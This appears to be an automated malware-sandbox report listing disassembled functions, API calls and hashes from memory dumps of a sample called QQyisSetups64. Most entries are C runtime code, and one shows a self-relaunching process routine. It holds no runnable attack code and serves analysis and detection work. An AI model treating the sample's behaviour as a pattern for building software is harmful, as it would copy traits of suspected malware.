__getptd.LIBCMT ref: 0288E139
__amsg_exit.LIBCMT ref: 0288E147
__lock.LIBCMT ref: 0288E157
__updatetlocinfoEx_nolock.LIBCMT ref: 0288E16B

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
Instruction ID: 4717e109d3f11feb32530f71abb78b45ea0e8e3c9212be7baaea68f5f105e8a4
Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
Instruction Fuzzy Hash: 33F0B43EA44614DBDB29FBBC980177D32A2AF04729F144109F554EB3D1DB34A440DE5B

Function 03795006 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03795012

Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B

__getptd.LIBCMT ref: 03795029
__amsg_exit.LIBCMT ref: 03795037
__lock.LIBCMT ref: 03795047
__updatetlocinfoEx_nolock.LIBCMT ref: 0379505B

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: b2eb4264dd65eb241df41ec9e2297f00bac74bc6cdad1047cc1de90978d538bb
Instruction ID: acd2f87bdf2bae4c3c18119d9568c27d5f78d45577ef071b4a708aea9d43a852
Opcode Fuzzy Hash: b2eb4264dd65eb241df41ec9e2297f00bac74bc6cdad1047cc1de90978d538bb
Instruction Fuzzy Hash: 89F0F63A904714EEFE61FB7C740975D73E05F45B20F15430BD5146F2C0CB3844028A96

Function 02C8E13F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02C8E14B

Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F

__getptd.LIBCMT ref: 02C8E162
__amsg_exit.LIBCMT ref: 02C8E170
__lock.LIBCMT ref: 02C8E180
__updatetlocinfoEx_nolock.LIBCMT ref: 02C8E194

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 5f50bbe14d7aaa350399b9fee5817d615b66b404789b044b83d061bccfd6d6d1
Instruction ID: a7bff18bb0de7bc29e858eed6970bae421d638dac670287596712102daacba16
Opcode Fuzzy Hash: 5f50bbe14d7aaa350399b9fee5817d615b66b404789b044b83d061bccfd6d6d1
Instruction Fuzzy Hash: A5F090329446149BE729BBB99C0577933A26F00B2CF14C219E455672C5CF745600EE55

Function 036149C5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 036149D1

Part of subcall function 0361381A: __getptd_noexit.LIBCMT ref: 0361381D
Part of subcall function 0361381A: __amsg_exit.LIBCMT ref: 0361382A

__getptd.LIBCMT ref: 036149E8
__amsg_exit.LIBCMT ref: 036149F6
__lock.LIBCMT ref: 03614A06
__updatetlocinfoEx_nolock.LIBCMT ref: 03614A1A

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
Instruction ID: b8310010607c32122f861804d9abe383fa781b986ff8f8483c5a91c49fd48c67
Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
Instruction Fuzzy Hash: 05F0B43A905310DEE762FB69980174D77F0AF00720F2D824DE515AF3D0CF644961CA5D

Function 0378C910 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 0378C932
GetCommandLineW.KERNEL32 ref: 0378C938
GetStartupInfoW.KERNEL32(?), ref: 0378C947
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0378C96F
ExitProcess.KERNEL32 ref: 0378C977

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
String ID:
API String ID: 3421218197-0
Opcode ID: 34f1de98e40111884da17622ab36a7127ac70f51772f3de7dd7f5ce3173bd5dc
Instruction ID: e04796cafbb9bbe076fc2145eb116d0c31fd780705f52240fa457f0a029798f4
Opcode Fuzzy Hash: 34f1de98e40111884da17622ab36a7127ac70f51772f3de7dd7f5ce3173bd5dc
Instruction Fuzzy Hash: 1CF0907168431CBBEB20ABA0DC4DFEB7778FB44B00F104694F719A60C5DA746A44CB54

Function 037875B0 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 037875D2
GetCommandLineW.KERNEL32 ref: 037875D8
GetStartupInfoW.KERNEL32(?), ref: 037875E7
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0378760F
ExitProcess.KERNEL32 ref: 03787617

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
String ID:
API String ID: 3421218197-0
Opcode ID: 2f428a3dbc220ef45ebb06cb1a69228045c0777fc810b335c9ec665176f0e083
Instruction ID: 01b099f6a05436d504047686bdc049aa483de80ae53ac3578d2e060e2e7db41e
Opcode Fuzzy Hash: 2f428a3dbc220ef45ebb06cb1a69228045c0777fc810b335c9ec665176f0e083
Instruction Fuzzy Hash: CDF0547168431DBBE720ABA4DC4DFDA7778EB44B00F208694F719A60C5D6746A44CF54

Function 0378F9B8 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 03791CD0: _doexit.LIBCMT ref: 03791CDC

___set_flsgetvalue.LIBCMT ref: 0378F9CA

Part of subcall function 03793CA0: TlsGetValue.KERNEL32(00000000,03793DF9,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000), ref: 03793CA9
Part of subcall function 03793CA0: DecodePointer.KERNEL32(?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06,0000000D), ref: 03793CBB
Part of subcall function 03793CA0: TlsSetValue.KERNEL32(00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06), ref: 03793CCA

___fls_getvalue@4.LIBCMT ref: 0378F9D5

Part of subcall function 03793C80: TlsGetValue.KERNEL32(?,?,0378F9DA,00000000), ref: 03793C8E

___fls_setvalue@8.LIBCMT ref: 0378F9E8

Part of subcall function 03793CD4: DecodePointer.KERNEL32(?,?,?,0378F9ED,00000000,?,00000000), ref: 03793CE5

GetLastError.KERNEL32(00000000,?,00000000), ref: 0378F9F1
ExitThread.KERNEL32 ref: 0378F9F8
GetCurrentThreadId.KERNEL32 ref: 0378F9FE
__freefls@4.LIBCMT ref: 0378FA1E

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 781180411-0
Opcode ID: 09695efacde22c3edadd9cd51127fcf6b23988413ffbadecc371c3689543cc8f
Instruction ID: ee3a4f155f0d646e3ea533fb72aa0c7f5af9a40c923c3cc0ec8d9e5d60f6fa19
Opcode Fuzzy Hash: 09695efacde22c3edadd9cd51127fcf6b23988413ffbadecc371c3689543cc8f
Instruction Fuzzy Hash: 5BE04F3DA40B1977FF00B7B1BD0C88F3B9C9D42191B150901EE14DB080EA28951187A2

Function 02C871AA Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02C882F0: _doexit.LIBCMT ref: 02C882FC

___set_flsgetvalue.LIBCMT ref: 02C871BC

Part of subcall function 02C89754: TlsGetValue.KERNEL32(00000000,02C898AD,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000), ref: 02C8975D
Part of subcall function 02C89754: DecodePointer.KERNEL32(?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA,0000000D), ref: 02C8976F
Part of subcall function 02C89754: TlsSetValue.KERNEL32(00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA), ref: 02C8977E

___fls_getvalue@4.LIBCMT ref: 02C871C7

Part of subcall function 02C89734: TlsGetValue.KERNEL32(?,?,02C871CC,00000000), ref: 02C89742

___fls_setvalue@8.LIBCMT ref: 02C871DA

Part of subcall function 02C89788: DecodePointer.KERNEL32(?,?,?,02C871DF,00000000,?,00000000), ref: 02C89799

GetLastError.KERNEL32(00000000,?,00000000), ref: 02C871E3
ExitThread.KERNEL32 ref: 02C871EA
GetCurrentThreadId.KERNEL32 ref: 02C871F0
__freefls@4.LIBCMT ref: 02C87210

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 781180411-0
Opcode ID: 7ea9ff52ef67dde942da6f7c074d998560ac300cf65be50843b0706da87c2d00
Instruction ID: d38077cf9e7e8e668fbb9516dd728fc4ddd1c839eaf7af840dc69fac23c318c3
Opcode Fuzzy Hash: 7ea9ff52ef67dde942da6f7c074d998560ac300cf65be50843b0706da87c2d00
Instruction Fuzzy Hash: 07E08C35C006096BCF113FF18D0CAFF7A2EAE4139CB50CC00EA10A3600EF389951AEA6

Function 028857F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02885820
_memset.LIBCMT ref: 0288583F
_memset.LIBCMT ref: 02885874

Part of subcall function 028859B7: _vswprintf_s.LIBCMT ref: 028859C8

Strings

D, xrefs: 02885853

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: _memset$_vswprintf_s
String ID: D
API String ID: 3424173483-2746444292
Opcode ID: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
Instruction ID: 5e8b3999bf48f1f83e36e6b2c2398a26ba19e82c77801203b24f105a2119b375
Opcode Fuzzy Hash: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
Instruction Fuzzy Hash: 1B41A6B4A40218AFE720DB64DC84FAA73B9EF08705F40419DE64DEB180DBB5DA848F94

Function 0360780F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03607832
_memset.LIBCMT ref: 0360785E
_memset.LIBCMT ref: 03607893

Part of subcall function 036080DF: _vswprintf_s.LIBCMT ref: 036080F0

Strings

D, xrefs: 03607872

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _memset$_vswprintf_s
String ID: D
API String ID: 3424173483-2746444292
Opcode ID: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
Instruction ID: 542a1b99ef7c7c60b0b3e33978bc30065a68dd6e4083b1b177833c99f6133923
Opcode Fuzzy Hash: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
Instruction Fuzzy Hash: 3941C2B5A00318ABEB24DB64DC85FDE77BCAB44700F1041D8E64DA62C0DAB06B85CF58

Function 03789430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0378944A

Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EF9B
Part of subcall function 0378EF86: __CxxThrowException@8.LIBCMT ref: 0378EFB0
Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EFC1

std::_Xinvalid_argument.LIBCPMT ref: 03789482

Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF4E
Part of subcall function 0378EF39: __CxxThrowException@8.LIBCMT ref: 0378EF63
Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF74

Strings

string too long, xrefs: 0378947D
invalid string position, xrefs: 03789445

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 68a6d3116eaf19511dba1eea2a93138e4aa4666691dd7597b61ef029705227c9
Instruction ID: 817cc8f50a9ba72d462c31eaf74df1306834119633416e82a5bbefa2dc6a1c69
Opcode Fuzzy Hash: 68a6d3116eaf19511dba1eea2a93138e4aa4666691dd7597b61ef029705227c9
Instruction Fuzzy Hash: 7A21A5337806109BC720FF6CE88097AF7D9EB92675B240A6FE296CB641D761D840C3A1

Function 037884B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 037884C9

Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EF9B
Part of subcall function 0378EF86: __CxxThrowException@8.LIBCMT ref: 0378EFB0
Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EFC1

std::_Xinvalid_argument.LIBCPMT ref: 037884E7

Strings

string too long, xrefs: 037884E2
invalid string position, xrefs: 037884C4

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: invalid string position$string too long
API String ID: 963545896-4289949731
Opcode ID: 5c26878c536f22ffef98a3d5740b2660399a7504d91fd0b2eac8a67d34f3e5dc
Instruction ID: d9f30047ca59837ddfe20977d32dfa962668567500fbd7ae81152ea2a0f81a87
Opcode Fuzzy Hash: 5c26878c536f22ffef98a3d5740b2660399a7504d91fd0b2eac8a67d34f3e5dc
Instruction Fuzzy Hash: 5D21A276740306EF8B14EF6CE880C59B3A9BF88310754466EF516CB641E730E954C792

Function 02893A27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 02893A3A

Part of subcall function 02893995: ___BuildCatchObjectHelper.LIBCMT ref: 028939CB

_UnwindNestedFrames.LIBCMT ref: 02893A51

Strings

csm, xrefs: 02893A36, 02893A4B, 02893A5E, 02893A7C, 02893A8C
csm, xrefs: 02893A29

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: BuildCatchObject$FramesHelperNestedUnwind
String ID: csm$csm
API String ID: 3487967840-3733052814
Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction ID: e5cf4e7924f0ecab90c470f09624c39d8323bcc67ed12400502e621476769e6b
Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction Fuzzy Hash: 1C01E47D00050ABBDF12AE55CC48EAA7FAAEF09354F088050BD1C95560D73299B1DBA2

Function 0362031A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 0362032D

Part of subcall function 03620288: ___BuildCatchObjectHelper.LIBCMT ref: 036202BE

_UnwindNestedFrames.LIBCMT ref: 03620344

Strings

csm, xrefs: 03620329, 0362033E, 03620351, 0362036F, 0362037F
csm, xrefs: 0362031C

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: BuildCatchObject$FramesHelperNestedUnwind
String ID: csm$csm
API String ID: 3487967840-3733052814
Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
Instruction ID: 84482f8d0269d8fbcb746f69fe47f8b7dc07bd5d76cd553c25f97fe84e335578
Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
Instruction Fuzzy Hash: 7B01463600061ABBCF12AF51CC84EEA7F6AFF08390F094114FC1858120DB7298B2DBA4

Function 0378D830 Relevance: 6.4, APIs: 5, Instructions: 140COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014), ref: 0378D868
IsBadReadPtr.KERNEL32(?,00000014), ref: 0378D938
SetLastError.KERNEL32(0000007F), ref: 0378D963

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Read$ErrorLast
String ID:
API String ID: 2715074504-0
Opcode ID: aef5358d38ba6f05c1fdf8fe74e95f5afe91d1f9d69c96b87a316b7d336ddbc1
Instruction ID: bc7e630111be4f192a5680f3f339bf3a050f628cb748087d8279d5cc29ef2984
Opcode Fuzzy Hash: aef5358d38ba6f05c1fdf8fe74e95f5afe91d1f9d69c96b87a316b7d336ddbc1
Instruction Fuzzy Hash: B5418D71A40205ABDB20EF99D880BAAF3F9FF88314F148599D85997391D774F901CB50

Function 02889A9D Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 02889AB1

Part of subcall function 0288977C: _free.LIBCMT ref: 0288C00B

__init_pointers.LIBCMT ref: 02889B63
__calloc_crt.LIBCMT ref: 02889BD1

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: __calloc_crt__init_pointers__mtterm_free
String ID:
API String ID: 3556499859-0
Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
Instruction ID: 4182a7814d539edc21b882bb4220b3f1d3da7740e149097f32e872a01095ebb5
Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
Instruction Fuzzy Hash: F6314C39840E35EAF721BF788D887293EE6EB49365B188516E518D7260FB32C481CF51

Function 036139D3 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 036139E7

Part of subcall function 036136B0: _free.LIBCMT ref: 0361870A

__init_pointers.LIBCMT ref: 03613A99
__calloc_crt.LIBCMT ref: 03613B07

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: __calloc_crt__init_pointers__mtterm_free
String ID:
API String ID: 3556499859-0
Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
Instruction ID: c6e1071400192cec55cf8a353e18060c36fea0ca34dfca66bc2defbe4d04026e
Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
Instruction Fuzzy Hash: 28318D35902730EFEB12EB758D98A17BFA4EB44A60B28451AF912DA3B1E7708061DF40

Function 0379A5C2 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0379A5F6
__isleadbyte_l.LIBCMT ref: 0379A629
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0379A65A
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0379A6C8

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 84cd25617957a522c3dc0b9b4fb67be328806ba7c64dc32fdc7b5bcc0fbe765d
Instruction ID: 494d0718a8ae3397ff10cb102bd9b314cfff5efc52ba7feeedfdeeac73e8d38f
Opcode Fuzzy Hash: 84cd25617957a522c3dc0b9b4fb67be328806ba7c64dc32fdc7b5bcc0fbe765d
Instruction Fuzzy Hash: 3031D231A06246EFEF60DF64E884EBE7BB5BF01311F1986AAE4518B191D330D940DB50

Function 02C8E425 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C8E459
__isleadbyte_l.LIBCMT ref: 02C8E48C
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02C8E4BD
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02C8E52B

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5409a707bf48ef68eca7cd22a5544c197f55725a6a658a2406b4ed55b4987517
Instruction ID: 00555c60207080469b045fa209b42342b20fe853a985645d098002fe1fcf130a
Opcode Fuzzy Hash: 5409a707bf48ef68eca7cd22a5544c197f55725a6a658a2406b4ed55b4987517
Instruction Fuzzy Hash: 3C31D431A05255EFDB11EFA4C884ABE3BB5EF8531CF19C5A9F4698B190D330DA40DB51

Function 03788020 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 03788038
_memset.LIBCMT ref: 03788042
lstrlenW.KERNEL32(?), ref: 0378804B
lstrlenW.KERNEL32(?), ref: 03788056

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: lstrlen$_memset
String ID:
API String ID: 2425037729-0
Opcode ID: 6c44f05da83ab8584652adc353d920fd550db10c6ec4312932d0753c131a1cb2
Instruction ID: 897a0cfd58e093b810ed3e3894231262899cf7c1afd9b18dd1a7ba0f54364546
Opcode Fuzzy Hash: 6c44f05da83ab8584652adc353d920fd550db10c6ec4312932d0753c131a1cb2
Instruction Fuzzy Hash: EB21FB76B4020CBBCF14EF59DC849BEB3A9EBC4720B69816EED0587301F7319D5186A1

Function 03784380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F), ref: 037843EC

Part of subcall function 037813A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 037813CB

Part of subcall function 037841E0: EnterCriticalSection.KERNEL32(03784FB5,03784E55,037842BE,00000000,?,?,03784E55,?,?,?,?,00000000,000000FF), ref: 037841E8
Part of subcall function 037841E0: LeaveCriticalSection.KERNEL32(03784FB5,?,?,?,00000000,000000FF), ref: 037841F6

Part of subcall function 03784C70: HeapFree.KERNEL32(?,00000000,?,00000000,03784E55,?,037842C8,03784E55,00000000,?,?,03784E55,?), ref: 03784C97

SetLastError.KERNEL32(00000000,?), ref: 037843D7
SetLastError.KERNEL32(00000057), ref: 03784401
WSAGetLastError.WS2_32(?), ref: 03784410

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

